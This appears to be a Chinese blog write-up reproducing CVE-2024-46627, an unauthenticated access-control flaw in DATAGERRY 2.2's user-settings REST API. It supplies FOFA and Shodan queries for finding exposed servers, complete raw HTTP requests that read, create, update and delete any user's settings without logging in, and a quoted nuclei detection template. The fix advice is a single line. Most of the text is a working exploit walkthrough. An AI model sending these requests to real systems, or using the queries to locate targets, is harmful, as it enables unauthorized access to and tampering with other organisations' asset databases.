0X01 产品描述:
DATAGERRY是一个灵活的开源CMDB和资产管理工具,它完全将数据模型的定义留给用户。 用户只需在一个易于使用的webfrontend中定义自己的对象类型(如服务器、路由器、租赁线路、位置等)。通过DATAGERRY的导出API,存储在DATAGERRY中的CMDB对象可以轻松地导出到外部系统,如监控系统、票据系统、配置管理等
0x02 漏洞描述:
DATAGERRY 2.2版本存在安全漏洞,该漏洞源于REST API 中缺少对以下端点的访问控制(/rest/users/<id>/settings/),这允许攻击者在未经身份验证的情况下读取任何用户的设置、创建设置、删除设置和更新设置。
0x03 影响版本:
DATAGERRY :2.2
0x04 搜索语句:
Fofa:title="datagerry"
0x05 漏洞复现:
该漏洞只出现在V2.2版本中,在REST API中缺少了对以下端点的访问控制,导致实现对用户配置增删改查
问题api
- /rest/users/<id>/settings/
(获取、发布)
- /rest/users/<id>/settings/<setting>
(删除、放置)
具体配置可以参考官网配置文档进行接口请求包构造:
2. User Management — DATAGERRY undefined documentation
复现过程:
获取所有设置对象:
GET /rest/users/1/settings/ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/x-www-form-urlencoded
Connection: close
查询特定的某一个设置对象:
注意这里settings后的路由换成所想查询的resource数据
GET /rest/users/1/settings/framework-type?typeAddSuccess=3 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/json
Connection: close
任意对象创建:
POST /rest/users/1/settings/ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/json,text/plain,*/*
Connection: close
{
"resource" : "framework-object-type-51121",
"user_id" : 1,
"setting_type" : "APPLICATION"
}
更新所创建的对象数据:
PUT /rest/users/1/settings/framework-object-type-5111 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/json,text/plain,*/*
Connection: close
{
"resource" : "framework-object-type-5111",
"user_id" : 1,
"payload" : {},
"setting_type" : "GLOBAL"
}
删除所选定的对象数据
DELETE /rest/users/1/settings/framework-object-type-51121 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/json,text/plain,*/*
Connection: close
附源自nuclei官网的poc
id: CVE-2024-46627
info:
name: DATAGERRY - REST API Auth Bypass
author: gy741
severity: critical
description: |
Incorrect access control in BECN DATAGERRY v2.2 allows attackers to execute arbitrary commands via crafted web requests.
impact: |
Allows unauthorized access to REST API
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-46627
- https://daly.wtf/cve-2024-46627-incorrect-access-control-in-becn-datagerry-v2-2-allows-attackers-to-execute-arbitrary-commands-via-crafted-web-requests/
- https://datagerry.com/
- https://github.com/DATAGerry/
- https://github.com/d4lyw/CVE-2024-46627
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2024-46627
cwe-id: CWE-284
epss-score: 0.00045
epss-percentile: 0.16328
metadata:
verified: true
max-request: 1
vendor: becon
product: datagerry
shodan-query: http.title:"datagerry"
tags: cve,cve2024,becon,datagerry,unauth,auth-bypass
http:
- method: GET
path:
- '{{BaseURL}}/rest/users/1/settings/'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"response_type":'
- '"model":'
- '"time":'
condition: and
- type: word
part: content_type
words:
- "application/json"
# digest: 4a0a00473045022040420efc711ffd5727fa72189da9f4e2830a0a1bd247edefb9c439
0x06 修复建议:
更新至最新版本
标签:xml,settings,image,46627,身份验证,Accept,application,REST,type From: https://blog.csdn.net/xc_214/article/details/142846232